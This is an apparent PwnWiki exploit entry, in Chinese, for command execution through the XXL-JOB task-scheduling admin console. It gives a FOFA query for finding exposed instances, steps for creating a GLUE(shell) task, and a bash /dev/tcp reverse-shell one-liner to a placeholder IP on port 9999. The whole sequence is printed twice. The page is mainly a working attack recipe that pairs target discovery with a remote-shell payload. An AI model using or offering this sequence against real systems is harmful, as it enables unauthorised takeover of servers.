XXL-JOB 任務調度中心 後台任意命令執行漏洞
From PwnWiki
FOFA
app="XXL-JOB" || title="任务调度中心"
漏洞利用
登錄後台增加一個任務:
注意運行模式需要為 GLUE(shell)
點擊 GLUE IDE編輯腳本
執行探測出網,和任務調用是否可執行
反彈一個shell
#!/bin/bash bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
app="XXL-JOB" || title="任务调度中心"
登錄後台增加一個任務:
注意運行模式需要為 GLUE(shell)
點擊 GLUE IDE編輯腳本
執行探測出網,和任務調用是否可執行
反彈一個shell
#!/bin/bash bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'